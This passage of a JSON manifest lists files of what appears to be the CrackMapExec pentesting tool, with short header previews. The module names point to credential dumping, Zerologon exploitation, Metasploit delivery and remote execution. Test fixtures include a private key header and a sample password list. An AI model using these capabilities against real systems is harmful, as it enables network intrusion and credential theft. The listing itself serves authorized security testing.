"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examp"
},
{
"path": "cme/modules/subnets.py",
"chars": 5547,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\n\n\ndef searchResE"
},
{
"path": "cme/modules/teams_localdb.py",
"chars": 2335,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sqlite3\n\n\nclass CMEModule:\n name = \"teams_localdb\"\n descrip"
},
{
"path": "cme/modules/test_connection.py",
"chars": 1212,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Executes the Test-Co"
},
{
"path": "cme/modules/trust.py",
"chars": 4327,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nclass CMEModule:\n '''\n Extract all Trust Relationships, Trusti"
},
{
"path": "cme/modules/uac.py",
"chars": 1426,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples"
},
{
"path": "cme/modules/user_desc.py",
"chars": 7483,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom datetime import datetime\nfrom impacket.lda"
},
{
"path": "cme/modules/veeam_dump.py",
"chars": 8955,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Initially created by @sadshade, all output to him:\n# https://github.com"
},
{
"path": "cme/modules/wcc.py",
"chars": 34919,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport logging\nimport operator\nimport sys\nimport time\nfrom t"
},
{
"path": "cme/modules/wdigest.py",
"chars": 5288,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerp"
},
{
"path": "cme/modules/web_delivery.py",
"chars": 1808,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Kicks off a Metasplo"
},
{
"path": "cme/modules/webdav.py",
"chars": 1651,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.protocols.smb.remotefile import RemoteFile\nfrom impacket import"
},
{
"path": "cme/modules/whoami.py",
"chars": 3294,
"preview": "class CMEModule:\n \"\"\"\n Basic enumeration of provided user information and privileges\n Module by spyr0 (@spyr0-s"
},
{
"path": "cme/modules/winscp_dump.py",
"chars": 19875,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# If you are looking for a local Version, the baseline code is from https"
},
{
"path": "cme/modules/wireless.py",
"chars": 4414,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom dploot.triage.masterkeys import MasterkeysTriage\nfrom dploot.lib.ta"
},
{
"path": "cme/modules/zerologon.py",
"chars": 4161,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# everything is comming from https://github.com/dirkjanm/CVE-2020-1472\n# "
},
{
"path": "cme/parsers/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/parsers/ip.py",
"chars": 973,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom ipaddress import ip_address, ip_network, summarize_address_range, i"
},
{
"path": "cme/parsers/nessus.py",
"chars": 1520,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xmltodict\n\n# Ideally i'd like to be able to pull this info out dy"
},
{
"path": "cme/parsers/nmap.py",
"chars": 1375,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom libnmap.parser import NmapParser\nfrom cme.logger import cme_logger\n"
},
{
"path": "cme/paths.py",
"chars": 597,
"preview": "import os\nimport sys\nimport cme\n\nCME_PATH = os.path.expanduser(\"~/.cme\")\nTMP_PATH = os.path.join(\"/tmp\", \"cme_hosted\")\ni"
},
{
"path": "cme/protocols/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ftp/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ftp/database.py",
"chars": 13825,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.dialects.sqlite import Insert\nf"
},
{
"path": "cme/protocols/ftp/db_navigator.py",
"chars": 6347,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\n\n\nclass"
},
{
"path": "cme/protocols/ftp/proto_args.py",
"chars": 453,
"preview": "def proto_args(parser, std_parser, module_parser):\n ftp_parser = parser.add_parser(\"ftp\", help=\"own stuff using FTP\","
},
{
"path": "cme/protocols/ftp.py",
"chars": 3963,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom cme.config import process_secret\nfrom cme.connection import *\nfrom c"
},
{
"path": "cme/protocols/ldap/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ldap/bloodhound.py",
"chars": 4689,
"preview": "import sys, time\n\nfrom cme.logger import CMEAdapter\nfrom bloodhound.ad.domain import ADDC\nfrom bloodhound.enumeration.co"
},
{
"path": "cme/protocols/ldap/database.py",
"chars": 2868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.orm import sessionmaker, scoped"
},
{
"path": "cme/protocols/ldap/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/ldap/gmsa.py",
"chars": 1494,
"preview": "from impacket.structure import Structure\n\n\nclass MSDS_MANAGEDPASSWORD_BLOB(Structure):\n structure = (\n (\"Versi"
},
{
"path": "cme/protocols/ldap/kerberos.py",
"chars": 11355,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nfrom binascii import hexlify, unhexlify\nfrom datetime impo"
},
{
"path": "cme/protocols/ldap/laps.py",
"chars": 11720,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pyasn1.codec.der import decoder\nfrom pyasn1_modules import rfc5652\n"
},
{
"path": "cme/protocols/ldap/proto_args.py",
"chars": 3711,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n ldap_parser = parser.add_p"
},
{
"path": "cme/protocols/ldap.py",
"chars": 63656,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/Ge"
},
{
"path": "cme/protocols/mssql/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/mssql/database.py",
"chars": 12992,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy import MetaData, func, Table, s"
},
{
"path": "cme/protocols/mssql/db_navigator.py",
"chars": 5906,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.helpers.misc import validate_ntlm\nfrom cme.cmedb import Databas"
},
{
"path": "cme/protocols/mssql/mssqlexec.py",
"chars": 3685,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport binascii\nfrom cme.logger import cme_logger\n\n\nclass MSSQLEXEC:\n "
},
{
"path": "cme/protocols/mssql/proto_args.py",
"chars": 3002,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n mssql_parser = parser.add_"
},
{
"path": "cme/protocols/mssql.py",
"chars": 16668,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nimport os\nfrom io import StringIO\n\nfrom cme.config import "
},
{
"path": "cme/protocols/rdp/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/rdp/database.py",
"chars": 2923,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\n\nfrom sqlalchemy.orm import sessionmaker, scoped"
},
{
"path": "cme/protocols/rdp/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/rdp/proto_args.py",
"chars": 1389,
"preview": "def proto_args(parser, std_parser, module_parser):\n rdp_parser = parser.add_parser('rdp', help=\"own stuff using RDP\","
},
{
"path": "cme/protocols/rdp.py",
"chars": 16275,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nfrom datetime import datetime\nfrom os import ge"
},
{
"path": "cme/protocols/smb/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/smb/atexec.py",
"chars": 8226,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom impacket.dcerpc.v5 import tsch, transport\nfrom impacket.d"
},
{
"path": "cme/protocols/smb/database.py",
"chars": 38935,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport base64\nimport warnings\nfrom datetime import datetime\nfrom pathlib "
},
{
"path": "cme/protocols/smb/db_navigator.py",
"chars": 27106,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.helpers.misc import validate_ntlm\nfrom cme.cmedb import Databas"
},
{
"path": "cme/protocols/smb/firefox.py",
"chars": 9884,
"preview": "#!/usr/bin/env python3\nfrom base64 import b64decode\nfrom binascii import unhexlify\nfrom hashlib import pbkdf2_hmac, sha1"
},
{
"path": "cme/protocols/smb/mmcexec.py",
"chars": 10251,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is"
},
{
"path": "cme/protocols/smb/passpol.py",
"chars": 8732,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Stolen from https://github.com/Wh1t3Fox/polenum\n\nfrom impacket.dcerpc.v"
},
{
"path": "cme/protocols/smb/proto_args.py",
"chars": 9099,
"preview": "def proto_args(parser, std_parser, module_parser):\n smb_parser = parser.add_parser(\"smb\", help=\"own stuff using S"
},
{
"path": "cme/protocols/smb/remotefile.py",
"chars": 1540,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom impacket.smb3structs import FILE_READ_DATA, FILE_WRITE_DATA\n\n\nclass "
},
{
"path": "cme/protocols/smb/samrfunc.py",
"chars": 9470,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Majorly stolen from https://gist.github.com/ropnop/7a41da7aabb8455d0898"
},
{
"path": "cme/protocols/smb/samruser.py",
"chars": 4847,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Stolen from Impacket\n\nfrom impacket.dcerpc.v5 import transport, samr\nfr"
},
{
"path": "cme/protocols/smb/smbexec.py",
"chars": 9530,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom os.path import join as path_join\nfrom time import sleep\nf"
},
{
"path": "cme/protocols/smb/smbspider.py",
"chars": 9338,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom time import strftime, localtime\nfrom cme.protocols.smb.remotefile i"
},
{
"path": "cme/protocols/smb/wmiexec.py",
"chars": 6933,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nimport os\nfrom time import sleep\nfrom cme.connection impor"
},
{
"path": "cme/protocols/smb.py",
"chars": 74814,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nimport hashlib\nimport binascii\nfrom io import StringIO\nfro"
},
{
"path": "cme/protocols/ssh/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ssh/database.py",
"chars": 19001,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom sqlalchemy.dialects.sqlite import Insert\nfrom sqlalchemy.orm import "
},
{
"path": "cme/protocols/ssh/db_navigator.py",
"chars": 12425,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\n\n\nclass"
},
{
"path": "cme/protocols/ssh/proto_args.py",
"chars": 841,
"preview": "def proto_args(parser, std_parser, module_parser):\n ssh_parser = parser.add_parser(\"ssh\", help=\"own stuff using SSH\","
},
{
"path": "cme/protocols/ssh.py",
"chars": 6872,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\n\nfrom io import StringIO\n\nimport paramiko\n\nfrom cme.config"
},
{
"path": "cme/protocols/vnc/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/vnc/database.py",
"chars": 3149,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy import MetaData, Table\nfrom sql"
},
{
"path": "cme/protocols/vnc/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/vnc/proto_args.py",
"chars": 664,
"preview": "def proto_args(parser, std_parser, module_parser):\n vnc_parser = parser.add_parser(\"vnc\", help=\"own stuff using VNC\","
},
{
"path": "cme/protocols/vnc.py",
"chars": 4422,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nfrom datetime import datetime\n\nfrom aardwolf.co"
},
{
"path": "cme/protocols/winrm/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/winrm/database.py",
"chars": 17008,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.dialects.sqlite import Insert\nf"
},
{
"path": "cme/protocols/winrm/db_navigator.py",
"chars": 9048,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help, print_table\nfrom cm"
},
{
"path": "cme/protocols/winrm/proto_args.py",
"chars": 3307,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n winrm_parser = parser.add_"
},
{
"path": "cme/protocols/winrm.py",
"chars": 17033,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport binascii\nimport hashlib\nimport os\nimport requests\n\nfrom io import "
},
{
"path": "cme/protocols/wmi/__init__.py",
"chars": 1,
"preview": "\n"
},
{
"path": "cme/protocols/wmi/database.py",
"chars": 2868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.orm import sessionmaker, scoped"
},
{
"path": "cme/protocols/wmi/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/wmi/proto_args.py",
"chars": 3522,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n wmi_parser = parser.add_pa"
},
{
"path": "cme/protocols/wmi/wmiexec.py",
"chars": 5411,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# Author: xiaolichan\n# Link: https://github.com/XiaoliChan/wmiexec-Re"
},
{
"path": "cme/protocols/wmi/wmiexec_event.py",
"chars": 10900,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# Author: xiaolichan\n# Link: https://github.com/XiaoliChan/wmiexec-Pr"
},
{
"path": "cme/protocols/wmi.py",
"chars": 20701,
"preview": "import os, struct, logging\n\nfrom io import StringIO\nfrom six import indexbytes\nfrom datetime import datetime\nfrom cme.co"
},
{
"path": "cme/servers/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/servers/http.py",
"chars": 3970,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport http.server\nimport threading\nimport ssl\nimport os\nimport sys\nfrom"
},
{
"path": "cme/servers/smb.py",
"chars": 1587,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport threading\nfrom threading import enumerate\nfrom sys import exit\nfr"
},
{
"path": "crackmapexec.spec",
"chars": 1559,
"preview": "# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\na = Analysis(['./cme/crackmapexec.py'],\n pathe"
},
{
"path": "flake.nix",
"chars": 968,
"preview": "{\n description = \"Application packaged using poetry2nix\";\n\n inputs.flake-utils.url = \"github:numtide/flake-utils\";\n i"
},
{
"path": "pyproject.toml",
"chars": 1689,
"preview": "[tool.poetry]\nname = \"crackmapexec\"\nversion = \"6.1.0\"\ndescription = \"A swiss army knife for pentesting networks\"\nauthors"
},
{
"path": "shell.nix",
"chars": 182,
"preview": "{ pkgs ? import <nixpkgs> {} }:\nlet\n myAppEnv = pkgs.poetry2nix.mkPoetryEnv {\n projectDir = ./.;\n editablePackage"
},
{
"path": "tests/README.md",
"chars": 478,
"preview": "# CME Tests\n## Running Tests\n### Unit Tests\n* Install CME (either in venv or via Poetry)\n* Run `pytest` (or `poetry run "
},
{
"path": "tests/data/test_key.priv",
"chars": 2610,
"preview": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQA"
},
{
"path": "tests/data/test_passwords.txt",
"chars": 24,
"preview": "Passw0rd!\nNone\nftp\nguest"
},
{
"path": "tests/data/test_users.txt",
"chars": 33,
"preview": "Administrator\nAnonymous\nftp\nguest"
},
{
"path": "tests/e2e_commands.txt",
"chars": 17095,
"preview": "##### SMB\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to "
},
{
"path": "tests/e2e_test.py",
"chars": 3379,
"preview": "import argparse\nimport os\nimport subprocess\nfrom rich.console import Console\n\n\ndef get_cli_args():\n parser = argparse"
},
{
"path": "tests/test_smb_database.py",
"chars": 4694,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport pytest\nfrom sqlalchemy import create_engine\nfrom sqlalc"
}
]